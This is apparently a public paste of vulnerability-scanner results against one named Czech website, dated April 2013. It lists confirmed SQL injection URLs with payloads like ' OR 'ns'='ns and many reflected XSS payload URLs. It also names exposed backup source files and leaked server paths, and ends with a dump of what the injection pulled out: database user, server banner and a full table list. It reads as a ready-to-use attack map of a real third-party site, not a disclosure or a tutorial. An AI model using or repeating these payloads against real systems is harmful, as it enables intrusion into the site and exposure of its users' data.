sroub3k

press.prdel.cz

Apr 6th, 2013
  27. ||| Boolean Based SQL Injection
  28.  
  29. Severity: Critical
  30. Confirmation: Confirmed
  31. URL: http://press.prdel.cz/data.php3?st=' OR 'ns'='ns
  32. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  33. Parameter Name: st
  34. Parameter Type: Querystring
  35. Attack Pattern: ' OR 'ns'='ns
  36.  
  37. Severity: Critical
  38. Confirmation: Confirmed
  39. URL: http://press.prdel.cz/audit-pridej.php3?id=-1 OR 17-7=10
  40. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  41. Parameter Name: id
  42. Parameter Type: Querystring
  43. Attack Pattern: -1 OR 17-7=10
  44.  
  45. Severity: Critical
  46. Confirmation: Confirmed
  47. URL: http://press.prdel.cz/data.php3?st=' OR 'ns'='ns&jmeno=3&prijmeni=3&jedna=3&dve=3&tri=3&autor=3
  48. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  49. Parameter Name: st
  50. Parameter Type: Querystring
  51. Attack Pattern: ' OR 'ns'='ns
  52.  
  53. ||| XSS (Cross-site Scripting)
  54.  
  55. Severity: Important
  56. Confirmation: Confirmed
  57. URL: http://press.prdel.cz/prew.php3?st=aaa
  58. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  59. Parameter Name: autor
  60. Parameter Type: Post
  61. Attack Pattern: '"--></style></script><script>alert(0x0008F3)</script>
  62.  
  63. Severity: Important
  64. Confirmation: Confirmed
  65. URL: http://press.prdel.cz/prew.php3?st=aaa
  66. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  67. Parameter Name: dve
  68. Parameter Type: Post
  69. Attack Pattern: '"--></style></script><script>alert(0x0008F7)</script>
  70.  
  71. Severity: Important
  72. Confirmation: Confirmed
  73. URL: http://press.prdel.cz/prew.php3?st=aaa
  74. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  75. Parameter Name: jedna
  76. Parameter Type: Post
  77. Attack Pattern: '"--></style></script><script>alert(0x0008FB)</script>
  78.  
  79. Severity: Important
  80. Confirmation: Confirmed
  81. URL: http://press.prdel.cz/prew.php3?st='"--></style></script><script>alert(0x0008FC)</script>
  82. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  83. Parameter Name: st
  84. Parameter Type: Querystring
  85. Attack Pattern: '"--></style></script><script>alert(0x0008FC)</script>
  86.  
  87. Severity: Important
  88. Confirmation: Confirmed
  89. URL: http://press.prdel.cz/prew.php3?st=aaa
  90. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  91. Parameter Name: jmeno
  92. Parameter Type: Post
  93. Attack Pattern: '"--></style></script><script>alert(0x0008FF)</script>
  94.  
  95. Severity: Important
  96. Confirmation: Confirmed
  97. URL: http://press.prdel.cz/prew.php3?st=aaa
  98. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  99. Parameter Name: prijmeni
  100. Parameter Type: Post
  101. Attack Pattern: '"--></style></script><script>alert(0x000901)</script>
  102.  
  103. Severity: Important
  104. Confirmation: Confirmed
  105. URL: http://press.prdel.cz/prew.php3?st=aaa
  106. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  107. Parameter Name: tri
  108. Parameter Type: Post
  109. Attack Pattern: '"--></style></script><script>alert(0x000903)</script>
  110.  
  111. Severity: Important
  112. Confirmation: Confirmed
  113. URL: http://press.prdel.cz/prew.php3?st='"--></style></script><script>alert(0x00090B)</script>
  114. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  115. Parameter Name: st
  116. Parameter Type: Querystring
  117. Attack Pattern: '"--></style></script><script>alert(0x00090B)</script>
  118.  
  119. Severity: Important
  120. Confirmation: Confirmed
  121. URL: http://press.prdel.cz/prew.php3?st=bush
  122. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  123. Parameter Name: jmeno
  124. Parameter Type: Post
  125. Attack Pattern: '"--></style></script><script>alert(0x00090C)</script>
  126.  
  127. Severity: Important
  128. Confirmation: Confirmed
  129. URL: http://press.prdel.cz/prew.php3?st=bush
  130. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  131. Parameter Name: prijmeni
  132. Parameter Type: Post
  133. Attack Pattern: '"--></style></script><script>alert(0x00090D)</script>
  134.  
  135. Severity: Important
  136. Confirmation: Confirmed
  137. URL: http://press.prdel.cz/prew.php3?st=bush
  138. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  139. Parameter Name: dve
  140. Parameter Type: Post
  141. Attack Pattern: '"--></style></script><script>alert(0x00090E)</script>
  142.  
  143. Severity: Important
  144. Confirmation: Confirmed
  145. URL: http://press.prdel.cz/prew.php3?st=bush
  146. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  147. Parameter Name: autor
  148. Parameter Type: Post
  149. Attack Pattern: '"--></style></script><script>alert(0x00090F)</script>
  150.  
  151. Severity: Important
  152. Confirmation: Confirmed
  153. URL: http://press.prdel.cz/prew.php3?st=bush
  154. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  155. Parameter Name: jedna
  156. Parameter Type: Post
  157. Attack Pattern: '"--></style></script><script>alert(0x000910)</script>
  158.  
  159. Severity: Important
  160. Confirmation: Confirmed
  161. URL: http://press.prdel.cz/index.php3?poz=20&bc=9'"--></style></script><script>alert(0x00097E)</script>
  162. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  163. Parameter Name: bc
  164. Parameter Type: Querystring
  165. Attack Pattern: 9'"--></style></script><script>alert(0x00097E)</script>
  166.  
  167. Severity: Important
  168. Confirmation: Confirmed
  169. Vulnerable URL: http://press.prdel.cz/data.php3?st=potrat&jmeno='"--></style></script><script>alert(0x0009A3)</script>&prijmeni=3&jedna=3&dve=3&tri=3&autor=3
  170. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  171. Parameter Name: jmeno
  172. Parameter Type: Querystring
  173. Attack Pattern: '"--></style></script><script>alert(0x0009A3)</script>
  174.  
  175. Severity: Important
  176. Confirmation: Confirmed
  177. URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni='"--></style></script><script>alert(0x0009A6)</script>&jedna=3&dve=3&tri=3&autor=3
  178. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  179. Parameter Name: prijmeni
  180. Parameter Type: Querystring
  181. Attack Pattern: '"--></style></script><script>alert(0x0009A6)</script>
  182.  
  183. Severity: Important
  184. Confirmation: Confirmed
  185. URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni=3&jedna='"--></style></script><script>alert(0x0009A8)</script>&dve=3&tri=3&autor=3
  186. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  187. Parameter Name: jedna
  188. Parameter Type: Querystring
  189. Attack Pattern: '"--></style></script><script>alert(0x0009A8)</script>
  190.  
  191. Severity: Important
  192. Confirmation: Confirmed
  193. URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni=3&jedna=3&dve='"--></style></script><script>alert(0x0009AA)</script>&tri=3&autor=3
  194. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  195. Parameter Name: dve
  196. Parameter Type: Querystring
  197. Attack Pattern: '"--></style></script><script>alert(0x0009AA)</script>
  198.  
  199. Severity: Important
  200. Confirmation: Confirmed
  201. URL: http://press.prdel.cz/data.php3?st=potrat&jmeno=3&prijmeni=3&jedna=3&dve=3&tri=3&autor='"--></style></script><script>alert(0x0009D0)</script>
  202. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  203. Parameter Name: autor
  204. Parameter Type: Querystring
  205. Attack Pattern: '"--></style></script><script>alert(0x0009D0)</script>
  206.  
  207. Severity: Important
  208. Confirmation: Confirmed
  209. URL: http://press.prdel.cz/audit-pridej.php3?chyba=1&prjmeno=warning&prvec=warning&prkomentar=warning&vec='"--></style></script><script>alert(0x000AB2)</script>&komentar=3
  210. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  211. Parameter Name: vec
  212. Parameter Type: Querystring
  213. Attack Pattern: '"--></style></script><script>alert(0x000AB2)</script>
  214.  
  215. Severity: Important
  216. Confirmation: Confirmed
  217. URL: http://press.prdel.cz/audit-pridej.php3?chyba=1&prjmeno=warning&prvec=warning&prkomentar=warning&vec=3&komentar='"--></style></script><script>alert(0x000AB3)</script>
  218. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  219. Parameter Name: komentar
  220. Parameter Type: Querystring
  221. Attack Pattern: '"--></style></script><script>alert(0x000AB3)</script>
  222.  
  223. ||| Backup Source Code Found
  224.  
  225. Severity: Important
  226. Confirmation: Confirmed
  227. Vulnerable URL: http://press.prdel.cz/data.php3~
  228. Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
  229.  
  230. Severity: Important
  231. Confirmation: Confirmed
  232. Vulnerable URL: http://press.prdel.cz/realizace.php3~
  233. Vulnerability Classifications: PCI 6.5.10 OWASP A7 CAPEC-87 CWE-425
  234.  
  235. ||| [Possible] Internal Path Leakage (*nix)
  236.  
  237. Severity: Information
  238. Confirmation: Confirmed
  239. Vulnerable URL: http://press.prdel.cz/phpinfo.php
  240. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  241.  
  242. Identified Internal Path(s):
  243.  
  244. /usr/obj/usr/src/sys/GENERIC
  245. /usr/local/etc/php'
  246. /usr/local'
  247. /usr/local/man'
  248. /usr/local/info/'
  249. /usr/local/etc
  250. /usr/local/etc/php.ini
  251. /usr/local/etc/php
  252. /usr/local/etc/php/extensions.ini
  253. /var/log/php_errors.log
  254. /usr/local/lib/php/20090626
  255. /usr/local/share/pear
  256. /usr/sbin/sendmail -t -i
  257. /usr/sbin/sendmail
  258. /usr/home/costra/web/prdel.cz/press/phpinfo.php
  259. /usr/local/bin/php-cgi
  260. /usr/sbin:/usr/bin
  261. /usr/home/costra/web/prdel.cz/press
  262.  
  263. ||| report db
  264.  
  265. Target: http://press.prdel.cz/audit-pridej.php3?id=-1+OR+17-7%3d10
  266. Web Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2
  267. Powered-by: PHP/5.3.8
  268. DB Server: MySQL
  269. Resp. Time(avg): 5281 ms
  270. Current User: prdel_cz@localhost
  271. Sql Version: 5.5.17
  272. Current DB: prdel_cz
  273. System User: prdel_cz@localhost
  274. Host Name: fubar.sigpipe.cz
  275. Installation dir: /usr/local
  276. DB User: 'prdel_cz'@'localhost'
  277. Data Bases: information_schema, prdel_cz, test
  278.  
  279. db: prdel_cz
  280. Tables:
  281.  
  282. grossip
  283. pomozmegrossovi
  284. prd_ankety
  285. prd_ankety_odp
  286. prd_autent
  287. prd_clanecky
  288. prd_clanecky_anotace
  289. prd_clanky_souvis_id
  290. prd_hororskopy
  291. prd_kategorie
  292. prd_koment
  293. prd_odkazy
  294. prd_poezie
  295. prd_poezie_autori
  296. prd_posta
  297. prd_pratele
  298. prd_reg
  299. prd_rubriky
  300. prd_soutez
  301. prdsowclanky
  302. pressanketa
  303. pressclanky
  304. pressdata
  305. presskomentare
  306. pressmaily
  307. ras_koment
  308.  
  309. System FreeBSD fubar.sigpipe.cz 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:15:25 UTC 2012 root@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386